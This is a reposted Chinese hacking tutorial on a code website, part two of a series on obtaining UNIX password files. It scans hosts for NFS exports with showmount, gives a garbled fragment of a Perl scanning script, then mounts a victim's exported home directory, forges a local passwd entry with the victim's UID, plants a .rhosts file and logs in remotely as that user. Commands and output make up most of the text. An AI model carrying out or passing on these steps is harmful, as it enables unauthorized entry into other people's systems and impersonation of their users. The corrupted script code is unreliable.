当前位置: 代码网 > 服务器>网络安全>加密解密 > 从UNIX系统获取密码档(二)

从UNIX系统获取密码档(二)

2008年10月08日 加密解密 我要评论
从UNIX系统获取密码档(二) 主题: 破解(Cracking)passwrd 文档 与新手交谈 困难的方法 利用mount命令获取访问权限 有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需... 08-10-08
ok,假设我们已有root权限,让我们开始!
可用shownmount命令显示另一系统是否有mountable的磁盘.
在root帐号下:
$root> showmount -e wwa.com
ount clntudp_create: rpc: port mapper failure - rpc: unable to receive
噢,这个域名不成功,ok,没问题,找下一个:
$root> showmount -e seva.net
export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/x11r6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/redhat (everyone)
 
注意上面的“everyone”,如果我们想从这家伙里安装linux 的话会很好.但我们是想打开用户的目录...所以继续下一个:
$root> showmount -e xxxxx.xxx ) {
chomp(?用户名:@hackbase.net密?码:
);
print "now checking:?用户名:@hackbase.net密?码:
";
# note difference in program output capture from "geturl.pl".
open (execfile, "$program?用户名:@hackbase.net密?码:
|");
@execresult = ;
next if (!defined($execresult[0]));
if ($execresult[0] =~ /^export/) {
print " - export list saved.";
open (outfile, ">?用户名:@hackbase.net密?码:
.export");
foreach (@execresult) {
print outfile;
}
close (outfile);
}
close(execfile);
print "\n";
}
# we are done. close all files and end the program.
close (domainfile);
0;
----------------- end of cmount.pl
ok,现在开始mounting(连接)磁盘.
假设我们运行showmount -e domain.com 并返回:
export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
我们想连接(mount) / 目录..哟呵…这家伙把整个系统都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
如果他把home目录设为共享(mountable)的话,命令为:
$root> mount -nt nfs domain.com:/home /tmp/mount
要umount系统的话,确信退出目录然后:
$root> umount /tmp/mount
 
先必须确定你已创建了共享(mount)目录(你可在系统任何地方创建).如果系统的/mnt目录是空的,你也可用它.
ok,下面动真格了:
bash# ls -al /mnt ; 确定/mnt是空的
ls: /mnt: no such file or directory ; 不存在这样的文件或目录 ;)
bash# mkdir /mnt ; 让我们为他建一个(/mnt目录)
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 开始 mount 这小家伙 ...
bash# cd /mnt ; 进入mounted的目录.
bash# ls ; 简单的dir ..
tt_db home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ... oh 很好...
bash# cd home
bash# ls -l ; 列长目录... 这儿tom 看起来不错 ;)
total 18
drwxr-xr-x 2 judy other 512 feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 sep 27 06:15 mk
drwxr-xr-x 6 news news 512 mar 6 1996 news
drwxr-xr-x 2 303 other 512 jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 oct 17 08:03 www
bash# ; 注意到tom 是 302号使用者 ... hmmm 把他放进我们的passwd 文档中.
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帐号 ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 sep 27 06:15 mk
drwxr-xr-x 6 news news 512 mar 6 1996 news
drwxr-xr-x 2 303 other 512 jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 jan 26 1996 view
drwxr-xr-x 10 15 audio 512 oct 17 08:03 www
bash$ ; 注意上面,toms 的用户号没有了... 现在我们拥有了他的目录!
bash$ echo >>tom/.rhosts ; 在tom的目录里建一个名为 .rhosts 的文档
(bash$ ;在.rhosts中加入 号,每个人都能用rlogin到他的帐户。)
bash$ rlogin xxxxx.xxx 在我们的机器上我们是tom了 , 因此rlogin 上平台.
last login: fri mar 7 00:16:03 from xxxxx.xxxxxxxxxx
sun microsystems inc. sunos 5.5 generic november 1995
> 雅皮士们 ,我们进去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 mar 1 17:10 .
drwxr-xr-x 14 tom group 512 jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 mar 11 08:26 .rhosts
>
现在我们有了访问权限了,可以开始hack这个系统了.哦,这该是下一课了,先轻松一下吧。

(0)

相关文章:

  • 缓冲区溢出解密二

    缓冲区溢出解密二

    缓冲区溢出解密二 而如果ESP被PUSH到堆栈,这是堆栈的表示: |_parametre_I___| EBP 12 |_parametre II... [阅读全文]
  • 缓冲区溢出解密三

    缓冲区溢出解密三

    缓冲区溢出解密三 如何执行 /bin/sh? 在C中,spawn出一个shell的代码可能象这样: shell.c : #include... [阅读全文]
  • 缓冲区溢出解密四

    缓冲区溢出解密四

    缓冲区溢出解密四 来自Aleph1的文章: “可见这不是一个有效的过程。甚至在知道堆栈开始的位置时,试图猜测偏移地址几乎是不可能的。好的情... [阅读全文]
  • SWF 探索者 1.4 的破解

    SWF 探索者 1.4 的破解

    SWF 探索者 1.4 的破解 初学破解!请大侠指导! 版权声明】 本文纯属技术交流, 转载请注明作者并保持文章的完整, 谢谢! 【破文标题】SWF探索者1.... [阅读全文]
  • 保护文字数据安全加密办公文档(图文)

    保护文字数据安全加密办公文档(图文) 【编者按:生活中我们总会面对各种各样的数据,对于那些需要保密的数据我们会选择各类的加密方法。那么对于使用办公软件制作的文稿、表格、演示文稿和…

    2008年10月08日 网络安全
  • UPX程序破解过程

    UPX程序破解过程

    UPX程序破解过程 入门级的破解,用ollydbg我用UPX将NOTEPAD.EXE加壳,选择OllyDbg 1.09d来脱壳。首先加载被加壳的程序,程序直接... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com